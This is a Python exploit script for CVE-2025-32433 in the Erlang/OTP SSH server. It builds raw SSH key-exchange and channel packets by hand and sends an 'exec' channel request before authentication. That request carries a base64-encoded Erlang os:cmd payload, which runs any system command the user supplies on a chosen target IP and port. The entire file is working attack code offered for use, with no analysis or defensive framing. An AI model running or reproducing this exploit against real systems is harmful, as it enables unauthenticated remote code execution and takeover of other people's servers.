import socket
import struct
import time
import argparse
import base64


# Helper to format SSH string (4-byte length + bytes)
def string_payload(s):
    s_bytes = s.encode("utf-8")
    return struct.pack(">I", len(s_bytes)) + s_bytes


# Builds SSH_MSG_CHANNEL_OPEN for session
def build_channel_open(channel_id=0):
    return (
        b"\x5a"  # SSH_MSG_CHANNEL_OPEN
        + string_payload("session")
        + struct.pack(">I", channel_id)  # sender channel ID
        + struct.pack(">I", 0x68000)  # initial window size
        + struct.pack(">I", 0x10000)  # max packet size
    )


# Builds SSH_MSG_CHANNEL_REQUEST with 'exec' payload
def build_channel_request(channel_id=0, command=None):
    return (
        b"\x62"  # SSH_MSG_CHANNEL_REQUEST
        + struct.pack(">I", channel_id)
        + string_payload("exec")
        + b"\x01"  # want_reply = true
        + string_payload(command)
    )


# Builds a minimal but valid SSH_MSG_KEXINIT packet
def build_kexinit():
    cookie = b"\x00" * 16

    def name_list(l):
        return string_payload(",".join(l))

    # Match server-supported algorithms from the log
    return (
        b"\x14"
        + cookie
        + name_list(
            [
                "curve25519-sha256",
                "ecdh-sha2-nistp256",
                "diffie-hellman-group-exchange-sha256",
                "diffie-hellman-group14-sha256",
            ]
        )  # kex algorithms
        + name_list(["rsa-sha2-256", "rsa-sha2-512"])  # host key algorithms
        + name_list(["aes128-ctr"]) * 2  # encryption client->server, server->client
        + name_list(["hmac-sha1"]) * 2  # MAC algorithms
        + name_list(["none"]) * 2  # compression
        + name_list([]) * 2  # languages
        + b"\x00"
        + struct.pack(">I", 0)  # first_kex_packet_follows, reserved
    )


# Pads a packet to match SSH framing
def pad_packet(payload, block_size=8):
    min_padding = 4
    padding_len = block_size - ((len(payload) + 5) % block_size)
    if padding_len < min_padding:
        padding_len += block_size
    return (
        struct.pack(">I", len(payload) + 1 + padding_len)
        + bytes([padding_len])
        + payload
        + bytes([0] * padding_len)
    )


# Convert system command to Erlang os:cmd format
def format_erlang_command(cmd):
    # Use base64 encoding to avoid escaping issues
    encoded_cmd = base64.b64encode(cmd.encode()).decode()
    # Create Erlang code that decodes and executes the command
    return f'os:cmd(binary_to_list(base64:decode("{encoded_cmd}"))).'


# === Exploit flow ===
def main():
    # Parse command line arguments
    parser = argparse.ArgumentParser(description='Exploit for Erlang CVE-2025-32433')
    parser.add_argument('-t', '--target', default="127.0.0.1", help='Target IP address (default: 127.0.0.1)')
    parser.add_argument('-p', '--port', type=int, default=2222, help='Target port (default: 2222)')
    parser.add_argument('-c', '--command', help='System command to execute (for example: touch /tmp/success)')
    parser.add_argument('-e', '--erlang', help='Interpret command as raw Erlang code instead of system command. (for example: os:cmd("touch /tmp/success").)')
    args = parser.parse_args()

    # Convert system command to Erlang command unless --erlang flag is used
    if args.erlang:
        erlang_cmd = args.erlang
    elif args.command:
        erlang_cmd = format_erlang_command(args.command)
    else:
        print(parser.print_help())
        return

    try:
        with socket.create_connection((args.target, args.port), timeout=5) as s:
            print("[*] Connecting to SSH server...")

            # 1. Banner exchange
            s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
            banner = s.recv(1024)
            print(f"[+] Received banner: {banner.strip().decode(errors='ignore')}")
            time.sleep(0.5)  # Small delay between packets

            # 2. Send SSH_MSG_KEXINIT
            print("[*] Sending SSH_MSG_KEXINIT...")
            kex_packet = build_kexinit()
            s.sendall(pad_packet(kex_packet))
            time.sleep(0.5)  # Small delay between packets

            # 3. Send SSH_MSG_CHANNEL_OPEN
            print("[*] Sending SSH_MSG_CHANNEL_OPEN...")
            chan_open = build_channel_open()
            s.sendall(pad_packet(chan_open))
            time.sleep(0.5)  # Small delay between packets

            # 4. Send SSH_MSG_CHANNEL_REQUEST (pre-auth!)
            print("[*] Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...")
            print(f"[*] Erlang payload: {erlang_cmd}")
            chan_req = build_channel_request(command=erlang_cmd)
            s.sendall(pad_packet(chan_req))

            print(
                f"[✓] Exploit sent! Command executed on target"
            )

            # Try to receive any response (might get a protocol error or disconnect)
            try:
                response = s.recv(1024)
                print(f"[+] Received response: {response.hex()}")
            except socket.timeout:
                print("[*] No response within timeout period (which is expected)")

    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    main()
